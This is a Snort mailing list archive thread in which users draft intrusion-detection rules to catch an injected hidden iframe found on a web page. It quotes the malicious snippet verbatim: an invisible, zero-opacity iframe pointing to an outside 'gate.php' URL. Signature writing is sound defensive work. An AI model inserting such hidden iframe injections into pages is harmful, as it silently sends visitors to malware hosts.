Snort mailing list archives
Re: Rule thought
From: "lists () packetmail net" <lists () packetmail net>
Date: Mon, 6 Aug 2012 13:27:25 -0500
On 08/06/12 13:13, James Lay wrote:
All, Recently (today) I ran into the below: <!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0></iframe></div><!--/qpi--> I've not seen an iframe injection that included a specified class before. My original draft rule looked like: alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"INDICATOR-COMPROMISE div class iframe in page"; file_data; pcre:"/<\/style><div class=[a-z]{9}><iframe src/i"; classtype:web-application-attack; sid:10000017; rev:1;) But this looks pretty expensive. I'm sure there's a better way to match this...would it be something like: content:"</style><div"; pcre:"/class=[a-z]{9}>/"; content:"<iframe src"; My question is how do I tell Snort to match all three consecutively? I get that I could use within, but would that apply to the pcre? Thanks for any advice.
I think there's more of an abnormality around the unquoted URL in the iframe and I'm not certain the class will always be 9 characters, but assuming it is how about: alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"INDICATOR-COMPROMISE div tag with class preceding iframe to specific URL"; flow:from_server, established; file_data; content:"<div class="; content:"<iframe src=http:"; fast_pattern; within:30; pcre:"/<div class=[a-z]{9}><iframe src=http[^\x3e]+\.php\?[a-z]=\d+\x20/"; classtype:bad-unknown; sid:x; rev:1;) Just a thought... Joel will probably want to add /smi ;) ------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ _______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
Current thread:
- Rule thought James Lay (Aug 06)
- Re: Rule thought lists () packetmail net (Aug 06)
- Re: Rule thought James Lay (Aug 06)
- Re: Rule thought lists () packetmail net (Aug 06)
- Re: Rule thought James Lay (Aug 06)
- Re: Rule thought lists () packetmail net (Aug 06)